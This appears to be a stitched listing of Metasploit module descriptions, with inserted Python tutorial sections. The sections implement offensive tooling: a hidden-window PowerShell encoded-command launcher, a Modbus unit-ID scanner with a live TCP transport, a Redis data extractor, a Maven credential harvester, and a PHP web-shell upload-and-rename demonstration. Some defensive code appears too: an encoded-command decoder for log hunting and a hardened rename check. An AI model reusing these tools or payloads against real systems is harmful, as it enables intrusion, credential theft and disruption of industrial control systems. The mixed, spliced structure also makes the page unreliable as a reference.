6846 matches found
Android Open Source Platform (AOSP) Browser UXSS
This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on...
Multi Manage DbVisualizer Query
DbVisualizer offers command line functionality to execute SQL against databases pre-configured with the GUI. The remote database can be accessed from the command line without the need to authenticate, and this module abuses this functionality to run a query and store the results. Please note: backslash quot...
Powershell Base64 Command Encoder
This module encodes the command as a base64 encoded command for PowerShell. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework
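The detail this entry leaves out is the charset: `powershell -EncodedCommand` expects base64 over UTF-16LE text, not UTF-8, and PowerShell accepts any unambiguous abbreviation of the switch (-e, -ec, -enc, ...). The following is an added example, not code from the Metasploit encoder module; it shows both the encoder side and the matching defender-side decoder for a logged process command line. Switch names, the sample command and the sample log line are constructed for illustration.

```python
import base64
from typing import Optional


def encode_powershell_command(command: str) -> str:
    """Produce the argument PowerShell expects after -EncodedCommand.

    PowerShell decodes the base64 to UTF-16LE text. Encoding the command as
    UTF-8 instead yields a string that decodes to garbage and fails to parse."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_powershell_command(encoded: str) -> str:
    """Inverse of encode_powershell_command; raises on malformed input."""
    raw = base64.b64decode(encoded, validate=True)
    if len(raw) % 2:
        raise ValueError("UTF-16LE payload must have an even number of bytes")
    return raw.decode("utf-16-le")


def build_command_line(command: str) -> str:
    """Full launcher string of the kind an encoder stage hands to a process spawn
    (the extra switches are a common choice, not something the page specifies)."""
    return ("powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden "
            f"-EncodedCommand {encode_powershell_command(command)}")


def _is_encoded_switch(token: str) -> bool:
    """PowerShell resolves any prefix of -EncodedCommand (-e, -ec, -enc, ...) to that
    switch, so a detection that only matches the full name misses most real usage."""
    if token[:1] not in "-/":
        return False
    t = token.lower().lstrip("-/")
    return 0 < len(t) <= len("encodedcommand") and "encodedcommand".startswith(t)


def extract_encoded_command(command_line: str) -> Optional[str]:
    """Defender-side helper: find and decode the payload in a logged process command
    line (e.g. Sysmon Event ID 1 or Security 4688). Returns None when there is none
    or the payload does not decode cleanly."""
    tokens = command_line.split()
    for i, tok in enumerate(tokens[:-1]):
        if _is_encoded_switch(tok):
            try:
                return decode_powershell_command(tokens[i + 1].strip('"\''))
            except (ValueError, UnicodeDecodeError):
                return None
    return None


if __name__ == "__main__":
    # Constructed sample: what an encoder emits, and what a log line looks like afterwards.
    print(build_command_line("whoami"))
    print(extract_encoded_command("powershell.exe -nop -w hidden -enc dwBoAG8AYQBtAGkA"))
```

When hunting, run `extract_encoded_command` over the process-creation command lines and alert on decoded text that itself contains `FromBase64String`, `IEX` or `DownloadString`; the first decode is rarely the last layer.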
OSX Gather Safari LastSession.plist
This module downloads the LastSession.plist file from the target machine. LastSession.plist is used by Safari to track active websites in the current session, and sometimes contains sensitive information such as usernames and passwords. This module will first download the original...
OSX Manage Record Microphone
This module allows the user to list the audio inputs on a remote OS X machine with the LIST action and capture from them with the RECORD action.
D-Link DIR-300B / DIR-600B / DIR-815 / DIR-645 HTTP Login Utility
This module attempts to authenticate to different D-Link HTTP management services. It has been tested successfully on D-Link DIR-300 Hardware revision B, D-Link DIR-600 Hardware revision B, D-Link DIR-815 Hardware revision A and DIR-645 Hardware revision A devices. It is possible that this module...
OpenSSL TLS 1.1 and 1.2 AES-NI DoS
The AES-NI implementation of OpenSSL 1.0.1c does not properly compute the length of an encrypted message when used with TLS version 1.1 or above. This leads to an integer underflow which can cause a DoS. The vulnerable function aesni_cbc_hmac_sha1_cipher is only included in the 64-bit versions of...
Digi ADDP Information Discovery
Discover host information through the Digi International ADDP service.
Modbus Unit ID and Station ID Enumerator
Modbus is a cleartext protocol used in common SCADA systems, originally developed as a serial-line (RS-232) asynchronous protocol and later carried over TCP/IP as Modbus/TCP; the default TCP port is 502. This module sends function code 0x04 (Read Input Registers) to the Modbus endpoint. If this command i...
Windows Manage Safe Delete
The goal of the module is to hinder the recovery of deleted files by overwriting their contents. This could be useful when you need to drop a file on the victim machine and then delete it without leaving clues about its contents. Note that the script does not wipe the free disk space, so...
Java Applet Field Bytecode Verifier Cache Remote Code Execution
This module exploits a vulnerability in HotSpot bytecode verifier where an invalid optimization of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checks. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operation...
Modbus Version Scanner
This module detects the Modbus service; it was tested on a SAIA PCD1.M2 system. Modbus is a cleartext protocol used in common SCADA systems, originally developed as a serial-line (RS-232) asynchronous protocol and later carried over TCP/IP as Modbus/TCP.
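Both Modbus entries above (the Unit ID enumerator and the version scanner) rest on the same exchange: a Modbus/TCP request carrying function code 0x04 and a reply that is either register data or an exception PDU. The following is an added example, not code from either Metasploit module. It builds the request frame, parses both reply shapes, and enumerates unit IDs the way the description implies: a unit that answers with data, or with any exception other than the gateway "no device behind this ID" codes (0x0A/0x0B), is treated as present. The `fake_gateway` transport is a constructed stand-in so the example runs offline; `tcp_sender` is the real transport and is not exercised here.

```python
import socket
import struct
from dataclasses import dataclass, field
from typing import Callable, Dict, Iterable, List, Optional

MODBUS_TCP_PORT = 502
FC_READ_INPUT_REGISTERS = 0x04
# Exception codes from the Modbus application protocol specification. 0x0A and 0x0B
# are generated by a gateway and mean "nothing is behind this unit ID".
EXCEPTION_CODES = {
    0x01: "Illegal function", 0x02: "Illegal data address", 0x03: "Illegal data value",
    0x04: "Slave device failure", 0x0A: "Gateway path unavailable",
    0x0B: "Gateway target device failed to respond",
}
GATEWAY_ABSENT = {"Gateway path unavailable", "Gateway target device failed to respond"}


def build_read_input_registers(transaction_id: int, unit_id: int,
                               start_addr: int = 0, count: int = 1) -> bytes:
    """Modbus/TCP ADU = MBAP header (tid, protocol 0, length, unit id) + PDU (fc, addr, qty).
    The MBAP length field counts the unit id byte plus the PDU."""
    pdu = struct.pack(">BHH", FC_READ_INPUT_REGISTERS, start_addr, count)
    mbap = struct.pack(">HHHB", transaction_id, 0, len(pdu) + 1, unit_id)
    return mbap + pdu


@dataclass
class ModbusReply:
    transaction_id: int
    unit_id: int
    function: int
    registers: List[int] = field(default_factory=list)
    exception: Optional[str] = None


def parse_reply(data: bytes) -> ModbusReply:
    """Validate the MBAP header, then decode either register values or an exception PDU."""
    if len(data) < 9:
        raise ValueError("reply too short for MBAP header + function code")
    tid, proto, length, uid = struct.unpack(">HHHB", data[:7])
    if proto != 0 or length != len(data) - 6:
        raise ValueError("bad protocol id or length field")
    fc = data[7]
    if fc & 0x80:  # exception: function code with the high bit set, then one exception byte
        code = data[8]
        return ModbusReply(tid, uid, fc & 0x7F,
                           exception=EXCEPTION_CODES.get(code, f"unknown exception 0x{code:02x}"))
    byte_count = data[8]
    body = data[9:9 + byte_count]
    if len(body) != byte_count or byte_count % 2:
        raise ValueError("register payload truncated")
    return ModbusReply(tid, uid, fc, list(struct.unpack(f">{byte_count // 2}H", body)))


def probe_unit_ids(send: Callable[[bytes], Optional[bytes]],
                   unit_ids: Iterable[int]) -> Dict[int, ModbusReply]:
    """One Read Input Registers request per unit ID. A unit counts as live when it answers
    with data or with any exception other than the gateway codes in GATEWAY_ABSENT."""
    live: Dict[int, ModbusReply] = {}
    for tid, uid in enumerate(unit_ids, start=1):
        raw = send(build_read_input_registers(tid & 0xFFFF, uid))
        if raw is None:
            continue  # timeout: nothing answered at all
        reply = parse_reply(raw)
        if reply.transaction_id != tid or reply.unit_id != uid:
            continue  # stale or misrouted answer
        if reply.exception not in GATEWAY_ABSENT:
            live[uid] = reply
    return live


def tcp_sender(host: str, port: int = MODBUS_TCP_PORT,
               timeout: float = 2.0) -> Callable[[bytes], Optional[bytes]]:
    """Real transport: one connection per request; None on timeout or connection failure."""
    def send(request: bytes) -> Optional[bytes]:
        try:
            with socket.create_connection((host, port), timeout=timeout) as s:
                s.sendall(request)
                return s.recv(260)  # max Modbus/TCP ADU
        except OSError:
            return None
    return send


def fake_gateway(request: bytes) -> Optional[bytes]:
    """Constructed offline stand-in: unit 1 holds two registers, unit 3 exists but rejects
    the function (exception 0x01), every other unit ID is empty behind the gateway (0x0B)."""
    tid, _proto, _length, uid = struct.unpack(">HHHB", request[:7])
    fc = request[7]
    if uid == 1:
        pdu = struct.pack(">BBHH", fc, 4, 0x1234, 0x0001)
    elif uid == 3:
        pdu = struct.pack(">BB", fc | 0x80, 0x01)
    else:
        pdu = struct.pack(">BB", fc | 0x80, 0x0B)
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, uid) + pdu


if __name__ == "__main__":
    for uid, reply in probe_unit_ids(fake_gateway, range(0, 8)).items():
        print(f"unit {uid}: registers={reply.registers} exception={reply.exception}")
```

Against a real target, swap `fake_gateway` for `tcp_sender(host)`. Reading one register at address 0 is about as gentle as a Modbus probe gets, but there is no authentication in the protocol, and some PLCs log or react to unexpected unit IDs, so coordinate with the plant owner before sweeping 0 to 247.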
IBM Personal Communications iSeries Access WorkStation 5.9 Profile
The IBM Personal Communications I-Series application WorkStation is susceptible to a stack-based buffer overflow vulnerability within file parsing in which data copied to a location in memory exceeds the size of the reserved destination area. The buffer is located on the runtime program stack. Wh...
Windows Gather VNC Password Extraction
This module extracts DES-encrypted passwords from known VNC locations.
Unix Command Shell, Bind TCP (via perl) IPv6
Listen for a connection and spawn a command shell via Perl.
Windows Disconnect Wireless Connection
This module disconnects the current wireless network connection on the specified interface.
Windows Gather Forensics Duqu Registry Check
This module searches for CVE-2011-3402 (Duqu) related registry artifacts.
eSignal and eSignal Pro File Parsing Buffer Overflow in QUO
The software is unable to handle the "" files, even those originally included in the program, such as those with the registered extensions QUO, SUM and POR. Successful exploitation of this vulnerability may take up to several seconds due to the use of an egghunter. Also, DEP bypass is unlikely due to the...
Windows Gather Run WMIC Commands
This module executes WMIC commands on the specified host.
IBM Tivoli Endpoint Manager POST Query Buffer Overflow
This module exploits a stack-based buffer overflow in the way IBM Tivoli Endpoint Manager versions 3.7.1, 4.1, 4.1.1 and 4.3.1 handle long POST query arguments. This issue can be triggered by sending a specially crafted HTTP POST request to the service lcfd.exe listening on TCP port 9495. To trigge...
Windows Executable Download and Evaluate VBS
Downloads a file from an HTTPS URL and executes it as a VBS script. Use it to stage a VBS-encoded payload from a short command line.
HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM01203. By making a specially crafted HTTP request to the "snmpviewer.exe" CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code lies within ...
Windows Gather ARP Scanner
This module performs an ARP scan of a given IP range through a Meterpreter session.
Apache Tomcat Transfer-Encoding Information Disclosure and DoS
Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not properly handle an invalid Transfer-Encoding header, which allows remote attackers to cause a denial of service (application outage) or obtain sensitive information via a crafted header that interferes with "recycling...
Apache HTTPD mod_negotiation Scanner
This module scans the web server of the given hosts for the presence of mod_negotiation. If the web server has mod_negotiation enabled, the IP address will be displayed.
MOXA Device Manager Tool 2.1 Buffer Overflow
This module exploits a stack buffer overflow in MOXA MDM Tool 2.1. When sending a specially crafted MDMGw (MDM2Gateway) response, an attacker may be able to execute arbitrary code.
Oracle DB SQL Injection via DBMS_EXPORT_EXTENSION
This module will escalate an Oracle DB user to DBA by exploiting a SQL injection bug in the DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA package. Note: This module has been tested against 9i, 10gR1 and 10gR2.
HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50. By sending a specially crafted CGI request, an attacker may be able to execute arbitrary code.
Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include
This module exploits a remote file inclusion vulnerability in includes/Cache/Lite/Output.php in the Cache_Lite package in Mambo 4.6.4 and earlier.
Microsoft SQL Server Configuration Enumerator
This module will perform a series of configuration audits and security checks against a Microsoft SQL Server database. For this module to work, valid administrative user credentials must be supplied.
Windows Command, Double Reverse TCP Connection (via Perl)
Creates an interactive shell via Perl.
phpBB viewtopic.php Arbitrary Code Execution
This module exploits two arbitrary PHP code execution flaws in the phpBB forum system. The problem is that the 'highlight' parameter in the 'viewtopic.php' script is not verified properly and will allow an attacker to inject arbitrary code via preg_replace. This vulnerability was introduced in...
PHP Command, Double Reverse TCP Connection (via Perl)
Creates an interactive shell via Perl.
SlimFTPd LIST Concatenation Overflow
This module exploits a stack buffer overflow in the SlimFTPd server. The flaw is triggered when a LIST command is received with an overly long argument. This vulnerability affects all versions of SlimFTPd prior to 3.16 and was discovered by Raphael Rigo.
Browse the session filesystem in a Web Browser
This module allows you to browse the session filesystem via a local browser window.
Module Options:
msf > use post/multi/manage/fileshare
msf post(fileshare) > show actions
    ...actions...
msf post(fileshare) > set ACTION <action-name>
msf post(fileshare) > show options
    ...show and set options...
msf post(fileshare) > run
This...
IPFire 2.25 Core Update 156 and Prior pakfire.cgi Authenticated RCE
This module exploits an authenticated command injection vulnerability in the /cgi-bin/pakfire.cgi web page of IPFire devices running versions 2.25 Core Update 156 and prior to execute arbitrary code as the root user.
Module Options:
msf > use exploit/linux/http/ipfire_pakfire_exec
msf...
Redis Extractor
This module connects to a Redis instance and retrieves the keys and data stored in it.
Module Options:
msf > use auxiliary/gather/redis_extractor
msf auxiliary(redis_extractor) > show actions
    ...actions...
msf auxiliary(redis_extractor) > set ACTION <action-name>
msf auxiliary(redis_extractor) > show options
    ...show and set options...
msf...
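"Retrieves keys and data stored" hides the protocol work an extractor actually does: speak RESP, list keys, ask each key's type, then issue the type-specific read. The following is an added example, not code from the Metasploit module. It implements a minimal RESP2 encoder/decoder and the KEYS -> TYPE -> GET/HGETALL/LRANGE/SMEMBERS walk over a `send` callback; `fake_redis` and `FAKE_DB` are a constructed in-memory stand-in so the example runs offline, and in real use `send` would write to a socket and read the reply. Only the four common value types are handled; the real module covers more.

```python
from typing import Any, Callable, Dict, Tuple


class RedisError(Exception):
    """An error reply from the server (for example NOAUTH when requirepass is set)."""


def encode_command(*args: Any) -> bytes:
    """Encode a command as a RESP array of bulk strings, the format clients send."""
    out = [b"*%d\r\n" % len(args)]
    for arg in args:
        b = arg if isinstance(arg, bytes) else str(arg).encode()
        out.append(b"$%d\r\n%s\r\n" % (len(b), b))
    return b"".join(out)


def decode_reply(buf: bytes, pos: int = 0) -> Tuple[Any, int]:
    """Decode one RESP2 reply at buf[pos]; returns (value, position after it).
    Simple strings decode to str, integers to int, bulk strings to bytes,
    arrays to lists, nil to None; error replies raise RedisError."""
    kind = buf[pos:pos + 1]
    end = buf.index(b"\r\n", pos)
    line, nxt = buf[pos + 1:end], end + 2
    if kind == b"+":
        return line.decode(), nxt
    if kind == b":":
        return int(line), nxt
    if kind == b"-":
        raise RedisError(line.decode())
    if kind == b"$":
        n = int(line)
        return (None, nxt) if n < 0 else (buf[nxt:nxt + n], nxt + n + 2)
    if kind == b"*":
        n = int(line)
        if n < 0:
            return None, nxt
        items = []
        for _ in range(n):
            item, nxt = decode_reply(buf, nxt)
            items.append(item)
        return items, nxt
    raise ValueError(f"unknown RESP type {kind!r}")


def extract_all(send: Callable[[bytes], bytes], pattern: str = "*") -> Dict[str, Any]:
    """KEYS -> TYPE -> type-specific read for every key. `send` transmits one encoded
    command and returns the raw reply bytes (a socket wrapper in real use)."""
    def call(*args: Any) -> Any:
        return decode_reply(send(encode_command(*args)))[0]

    result: Dict[str, Any] = {}
    for key in call("KEYS", pattern):  # on a large instance SCAN is the polite choice
        k = key.decode()
        t = call("TYPE", k)
        if t == "string":
            result[k] = call("GET", k)
        elif t == "hash":
            flat = call("HGETALL", k)
            result[k] = dict(zip(flat[::2], flat[1::2]))
        elif t == "list":
            result[k] = call("LRANGE", k, 0, -1)
        elif t == "set":
            result[k] = call("SMEMBERS", k)
        else:
            result[k] = f"<unhandled type {t}>"
    return result


def encode_reply(value: Any) -> bytes:
    """RESP2 encoder used by the fake server: str -> simple string, bytes -> bulk,
    int -> integer, list -> array, None -> nil bulk."""
    if value is None:
        return b"$-1\r\n"
    if isinstance(value, str):
        return b"+%s\r\n" % value.encode()
    if isinstance(value, int):
        return b":%d\r\n" % value
    if isinstance(value, bytes):
        return b"$%d\r\n%s\r\n" % (len(value), value)
    return b"*%d\r\n" % len(value) + b"".join(encode_reply(v) for v in value)


# Constructed in-memory stand-in for a Redis instance; not a real server.
FAKE_DB: Dict[bytes, Any] = {
    b"session:1a2b": b"user=alice;role=admin",
    b"config": {b"db_password": b"hunter2", b"smtp_host": b"mail.example.internal"},
    b"recent_ips": [b"10.0.0.5", b"10.0.0.9"],
}
_TYPE_NAMES = {bytes: "string", dict: "hash", list: "list"}


def fake_redis(raw: bytes) -> bytes:
    args, _ = decode_reply(raw)
    cmd, rest = args[0].upper(), args[1:]
    if cmd == b"KEYS":
        return encode_reply(sorted(FAKE_DB))  # pattern ignored in the stand-in
    val = FAKE_DB.get(rest[0])
    if cmd == b"TYPE":
        return encode_reply("none" if val is None else _TYPE_NAMES[type(val)])
    if cmd == b"GET":
        return encode_reply(val)
    if cmd == b"HGETALL":
        return encode_reply([b for kv in val.items() for b in kv])
    if cmd == b"LRANGE":
        return encode_reply(val)
    return b"-ERR unknown command\r\n"


if __name__ == "__main__":
    for k, v in extract_all(fake_redis).items():
        print(k, "->", v)
```

A `RedisError` carrying `NOAUTH Authentication required.` on the first call is the signal that the instance is not the open, unauthenticated kind this module is aimed at.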
VMware vRealize Operations (vROps) Manager SSRF RCE
This module exploits a pre-auth SSRF (CVE-2021-21975) and a post-auth file write (CVE-2021-21983) in VMware vRealize Operations Manager to leak admin credentials and write/execute a JSP payload. CVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and CVE-2021-21983 affects the...
WordPress Simple File List Unauthenticated Remote Code Execution
The Simple File List (simple-file-list) plugin before 4.2.3 for WordPress allows remote unauthenticated attackers to upload files within a controlled list of extensions. However, the rename function does not conform to the file extension restrictions, thus allowing arbitrary PHP code to be uploaded fir...
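The bug class here is a classic: the upload path enforces an extension allowlist, and a second path that also changes a file's name does not. The following is an added example, not the plugin's code or the Metasploit module's; it models the flaw and its fix in Python against an in-memory directory so it runs offline. The allowlist, the executable-extension denylist and the file names are assumptions for illustration; the page does not quote the plugin's actual lists.

```python
import os
from typing import Dict, List

# Assumed allowlist for illustration; the plugin's real list is not quoted on this page.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf", "txt", "zip"}
# Extensions a typical PHP host hands to the interpreter, wherever they appear in the name.
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}


class UploadDir:
    """In-memory stand-in for the plugin's upload directory."""
    def __init__(self) -> None:
        self.files: Dict[str, bytes] = {}


def upload_allowed(filename: str) -> bool:
    """The check the upload handler applies: only the final extension is inspected."""
    ext = filename.rsplit(".", 1)[1].lower() if "." in filename else ""
    return ext in ALLOWED_EXTENSIONS


def upload(store: UploadDir, filename: str, data: bytes) -> None:
    if not upload_allowed(filename):
        raise PermissionError(f"upload rejected: {filename}")
    store.files[filename] = data


def rename_vulnerable(store: UploadDir, old: str, new: str) -> None:
    """Mirrors the flaw described above: the new name is never validated, so an
    allowed upload such as innocent.png becomes shell.php with one request."""
    store.files[new] = store.files.pop(old)


def rename_hardened(store: UploadDir, old: str, new: str) -> None:
    """Every name-changing operation must re-run the allowlist, reject path components,
    and refuse an executable extension anywhere in the name (so shell.php.png is
    also refused on servers that dispatch on inner extensions)."""
    if not new or new in (".", "..") or os.path.basename(new) != new or "\\" in new:
        raise PermissionError("rename rejected: path component in new name")
    inner = [s.lower() for s in new.split(".")[1:]]
    if not upload_allowed(new) or any(s in EXECUTABLE_EXTENSIONS for s in inner):
        raise PermissionError(f"rename rejected: {new}")
    store.files[new] = store.files.pop(old)


def executable_files(store: UploadDir) -> List[str]:
    """What the attacker is after: names the web server would execute rather than serve."""
    return sorted(n for n in store.files
                  if n.rsplit(".", 1)[-1].lower() in EXECUTABLE_EXTENSIONS)


if __name__ == "__main__":
    # Constructed payload: a PHP web shell disguised as an image at upload time.
    store = UploadDir()
    upload(store, "innocent.png", b"<?php system($_GET['c']); ?>")
    rename_vulnerable(store, "innocent.png", "shell.php")
    print("vulnerable rename left behind:", executable_files(store))
```

The hardened version also shows why "validate on upload" is not a complete control: any endpoint that can move, copy or rename a stored file is part of the same trust boundary and needs the same check.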
Windows Inject PE Files, Hidden Bind TCP Stager
Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address of entry after performing image base relocation and API address resolution. This module requires a PE file that contains...
Linux Gather HexChat/XChat Enumeration
This module will collect HexChat and XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will...
Horde CSV import arbitrary PHP code execution
The Horde_Data module, version 2.1.4 and before, present in Horde Groupware version 5.2.22 allows authenticated users to inject arbitrary PHP code, thus achieving RCE on the server hosting the web application.
FreeBSD rtld execl() Privilege Escalation
This module exploits a vulnerability in the FreeBSD run-time link-editor (rtld). The rtld unsetenv() function fails to remove LD_* environment variables if __findenv() fails. This can be abused to load arbitrary shared objects using LD_PRELOAD, resulting in privileged code execution. This module has been...
IBM WebSphere MQ Channel Name Bruteforce
This module uses a dictionary to brute-force MQ channel names. For all identified channels it also reports whether SSL is used and whether it is a server-connection channel.
Brother Debut http Denial Of Service
The Debut embedded HTTP server... Authors: z00n (vulnerability disclosure), h00die (Metasploit module). References: CVE-2017-16249; URL...
Cambium cnPilot r200/r201 SNMP Enumeration
Cambium cnPilot r200/r201 devices can be administered using SNMP. The device configuration contains IP addresses, keys, passwords, and lots of other sensitive information. This module exploits an access control flaw which allows remotely extracting sensitive information such as account passwords, WiFi PSK, ...
Cambium cnPilot r200/r201 File Path Traversal
This module exploits a file path traversal vulnerability in Cambium cnPilot r200/r201 to read arbitrary files off the file system. Affected versions: 4.3.3-R4 and prior.
Linux Meterpreter, Reverse HTTPS Inline
Run the Meterpreter / Mettle server payload (stageless).
Multi Gather Maven Credentials Collection
This module will collect the contents of all users' settings.xml files on the targeted machine.
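Collecting settings.xml is the easy half; the useful half is pulling the `<server>` and `<proxy>` credentials out of it and telling plaintext passwords from Maven-encrypted ones (`{...}`, which are recoverable with the master password in ~/.m2/settings-security.xml). The following is an added example, not the Metasploit module's code. `SAMPLE_SETTINGS` is a constructed file with invented ids, hosts and passwords; it carries the default namespace Maven writes, which is why the parser strips namespaces before matching tag names.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed settings.xml for the example. Real files carry the same default namespace,
# so matching on bare tag names without stripping it finds nothing.
SAMPLE_SETTINGS = """<?xml version="1.0" encoding="UTF-8"?>
<settings xmlns="http://maven.apache.org/SETTINGS/1.0.0">
  <servers>
    <server><id>corp-nexus</id><username>ci-bot</username><password>s3cret</password></server>
    <server><id>releases</id><username>deployer</username><password>{COQLCE6DU6GtcS5P=}</password></server>
    <server><id>scp-host</id><username>git</username><privateKey>${user.home}/.ssh/id_rsa</privateKey><passphrase>pp</passphrase></server>
  </servers>
  <proxies>
    <proxy><id>corp</id><host>proxy.example.internal</host><port>3128</port><username>proxyuser</username><password>proxypw</password></proxy>
  </proxies>
</settings>"""


def _local(tag: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on qualified tag names."""
    return tag.rsplit("}", 1)[-1]


def extract_credentials(xml_text: str) -> List[Dict[str, object]]:
    """One record per <server> and <proxy>: every child element as a field, plus
    'kind' and 'encrypted' (True when the password uses Maven's {...} wrapping,
    which is decryptable given ~/.m2/settings-security.xml, not a one-way hash)."""
    root = ET.fromstring(xml_text)
    records: List[Dict[str, object]] = []
    for node in root.iter():
        kind = _local(node.tag)
        if kind not in ("server", "proxy"):
            continue
        rec: Dict[str, object] = {"kind": kind}
        rec.update({_local(c.tag): (c.text or "").strip() for c in node})
        pw = str(rec.get("password", ""))
        rec["encrypted"] = pw.startswith("{") and pw.endswith("}")
        records.append(rec)
    return records


def plaintext_secrets(records: List[Dict[str, object]]) -> List[str]:
    """Ids whose password or passphrase is stored unencrypted; the quick triage view."""
    return [str(r["id"]) for r in records
            if (r.get("password") and not r["encrypted"]) or r.get("passphrase")]


if __name__ == "__main__":
    recs = extract_credentials(SAMPLE_SETTINGS)
    for r in recs:
        print(r)
    print("plaintext:", plaintext_secrets(recs))
```

On a real host the same function runs over each `~/.m2/settings.xml` the module gathers; a `<server>` with a `privateKey` path is a pointer to a second file worth collecting.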
Razer Synapse rzpnk.sys ZwOpenProcess
A vulnerability exists in the latest version of Razer Synapse (v2.20.15.1104 as of the day of disclosure) which can be leveraged locally by a malicious application to elevate its privileges to those of NT AUTHORITY\SYSTEM. The vulnerability lies in a specific IOCTL handler in the rzpnk.sys driver th...